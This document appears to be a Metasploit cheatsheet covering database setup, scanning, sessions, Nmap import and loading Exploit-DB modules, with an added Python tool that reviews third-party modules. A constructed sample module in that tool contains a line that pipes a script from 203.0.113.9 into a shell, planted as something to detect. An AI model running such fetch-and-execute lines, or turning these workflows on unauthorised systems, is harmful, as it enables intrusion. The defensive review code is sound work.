Metasploit Cheatsheet
enabling the database
Metasploit can save the loot it collects in a PostgreSQL database for later reference. The loot includes, among other things, hosts, credentials and vulnerabilities.
# Set up the database
sudo systemctl enable postgresql
sudo msfdb init
# Use the db
msf6 > db_status # check the connection
msf6 > db_import <filename> # import data from external tools, e.g. Nmap XML output
msf6 > db_connect -y /usr/share/metasploit-framework/config/database.yml
msf6 > db_export <filename> # export the db; useful if you're using different attacking machines
It's worth running db_import without a parameter to ensure the connection with the database is actually working, as db_status might lie.
workspaces
msf6 > workspace # list workspaces
msf6 > workspace -a <name> # add a workspace and switch to it immediately
hosts
msf6 > hosts # show targets we interacted with
creds
msf6 > creds # show credentials extracted using Metasploit modules
search for and use the modules
msf6 > search portscan # search for port scanning modules
msf6 > use <index>
msf6 > search ftp type:aux # filter modules by type
port scanning
msf6 > use auxiliary/scanner/portscan/tcp # an example scanner module
msf6 > options # list available options
msf6 > advanced # list advanced options
msf6 > set RHOSTS <target_ip_1> [<target_ip_2>]
msf6 > set PORTS 1-10000
msf6 > exploit # or `run` but we are the l33t
services
msf6 > services # shows services running on the hosts we interacted with
global settings
msf6 > setg RHOSTS <target_ip> # set an option globally for the active workspace's scope
sessions
msf6 > sessions # list active connections
msf6 > sessions [-i] <id> # interact with (attach to) session <id>
msf6 > background # exit the session without closing the connection
msf6 > sessions -k <id> # kill the session
shell commands
msf6 > curl -I <target_ip> # easy; add `-k|--insecure` to skip certificate validation
combining Metasploit with Nmap
msf6 > db_nmap <params> # calls Nmap with params and saves the results in the database
msf6 > services # list the services identified with db_nmap
💡 You can also use rustscan.
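To make concrete what db_import and db_nmap actually pull out of an Nmap run and store in the hosts and services tables, here is an added example that is not part of this cheatsheet or of Metasploit itself: a small Python parser over a constructed Nmap XML (-oX) document. Hosts that were down get no row, closed ports are dropped, and every other port keeps its state string so you can tell a confirmed "open" from an "open|filtered" guess. The sample XML, the record shapes and the open_services helper are this example's own assumptions, not Metasploit's schema.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap XML (-oX) sample, not output of a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/30" start="0">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <hostnames><hostname name="gw.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.0.0.2" addrtype="ipv4"/>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.0.3" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return (hosts, services) shaped like the `hosts` / `services` tables.

    Hosts that were not up get no row. Closed ports are dropped; other
    port states are kept with their state string so the caller can filter.
    """
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # a host that never answered gets no row
        ipv4 = host.find("address[@addrtype='ipv4']")
        if ipv4 is None:
            continue
        mac = host.find("address[@addrtype='mac']")
        hostname = host.find("hostnames/hostname")
        hosts.append({
            "address": ipv4.get("addr"),
            "mac": mac.get("addr") if mac is not None else None,
            "name": hostname.get("name") if hostname is not None else None,
        })
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            if state == "closed":
                continue  # closed ports never become service rows
            svc = port.find("service")
            info = ""
            if svc is not None:
                info = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            services.append({
                "host": ipv4.get("addr"),
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state,
                "name": svc.get("name") if svc is not None else None,
                "info": info,
            })
    return hosts, services


def open_services(services):
    """Confirmed-open services only, as 'ip:port/proto name' strings."""
    return [f"{s['host']}:{s['port']}/{s['proto']} {s['name'] or '?'}"
            for s in services if s["state"] == "open"]


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in hosts:
        print("host", h)
    for line in open_services(services):
        print("open", line)
```

Running it prints two host rows and two confirmed-open services; the SNMP row is kept in `services` with state `open|filtered` but left out of `open_services`, which is the distinction you want before trusting a `services` listing as an inventory.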
importing modules to Metasploit
Not every Metasploit module can be found with search. If we stumble upon one elsewhere, e.g. on Exploit-DB, we can import it into Metasploit by copying or symlinking it:
# for Kali Linux
cp /usr/share/exploitdb/exploits/php/remote/9939.rb /usr/share/metasploit-framework/modules # if you have the disk space
ln -s /usr/share/exploitdb/exploits/php/remote/9939.rb /usr/share/metasploit-framework/modules # if you don't ¯\_(ツ)_/¯
# the file has to end up under a subdirectory matching its type (e.g. modules/exploits/<platform>/...,
# or ~/.msf4/modules/exploits/...); afterwards run `reload_all` in msfconsole so it shows up in search
💡 python-based modules might need code adjustments to work with Metasploit
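A module pulled from an exploit archive runs as Ruby inside msfconsole with the operator's privileges, so it is worth reading before it goes into the modules directory. The following Python script is an added example, not part of this cheatsheet or of the Metasploit project: it pulls the metadata a module declares (parent class, Rank, Name, References) and flags constructs a reviewer would want explained. The module text is constructed for the demonstration, the CVE/EDB ids in it are placeholders, and the regex heuristics are this example's own, not a Metasploit feature.

```python
import re

# Constructed stand-in for a third-party module file; not a real Exploit-DB entry.
# The CVE/EDB ids are placeholders and the exploit body is deliberately
# dubious so the review function has something to flag.
SAMPLE_MODULE = r'''
##
# This module requires Metasploit: https://metasploit.com/download
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Example Web App Remote Code Execution',
      'Description'    => %q{ Constructed example used only to demonstrate module review. },
      'Author'         => [ 'someone' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', 'XXXX-XXXXX' ],
          [ 'EDB', 'XXXXX' ]
        ],
      'Platform'       => 'php',
      'Targets'        => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => '2009-01-01',
      'DefaultTarget'  => 0))
  end

  def exploit
    stage = Base64.decode64('aGVsbG8gd29ybGQ=')
    `curl http://203.0.113.9/stage.sh | sh`
  end
end
'''

# Reference types Metasploit modules commonly declare.
REF_TYPES = "CVE|EDB|URL|BID|OSVDB|MSB|ZDI|WPVDB"

# (regex, what a reviewer would want explained before loading the file);
# these are this example's heuristics, not a Metasploit feature.
SUSPICIOUS = [
    (r"`[^`]+`", "backtick shell execution on the operator's own machine"),
    (r"\b(?:system|exec|spawn)\s*\(", "direct process execution"),
    (r"IO\.popen|Open3\.", "process execution via IO.popen / Open3"),
    (r"\beval\s*\(", "eval of dynamically built Ruby"),
    (r"Base64\.decode64", "encoded blob decoded at runtime"),
    (r"\b\d{1,3}(?:\.\d{1,3}){3}\b", "hard-coded IP address (targets belong in RHOSTS/LHOST)"),
]


def module_metadata(src):
    """Pull the identifying fields a module declares via update_info."""
    parent = re.search(r"class\s+MetasploitModule\s*<\s*(Msf::[\w:]+)", src)
    rank = re.search(r"^\s*Rank\s*=\s*(\w+)", src, re.M)
    name = re.search(r"'Name'\s*=>\s*'([^']*)'", src)
    refs = re.findall(r"\[\s*'(" + REF_TYPES + r")'\s*,\s*'([^']*)'\s*\]", src)
    return {
        "parent": parent.group(1) if parent else None,
        "rank": rank.group(1) if rank else None,
        "name": name.group(1) if name else None,
        "references": refs,
    }


def review_findings(src):
    """List (label, matched text) pairs for constructs worth a manual look."""
    findings = []
    for pattern, label in SUSPICIOUS:
        for match in re.findall(pattern, src):
            findings.append((label, match))
    return findings


if __name__ == "__main__":
    meta = module_metadata(SAMPLE_MODULE)
    print(f"{meta['name']} ({meta['parent']}, {meta['rank']}) refs={meta['references']}")
    for label, text in review_findings(SAMPLE_MODULE):
        print(f"  [review] {label}: {text}")
```

On the constructed module this reports three findings (a backtick command, a decoded blob and a hard-coded IP), which is exactly the kind of thing that should never be in a module that takes its target from RHOSTS; a legitimate module would have none of them. Point the script at a real downloaded file (read it into `src`) before copying it into the modules tree.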
services that host payloads
- Exploit-DB - you probably know that one anyway
- Sploitus
- Packet Storm
- 0day.today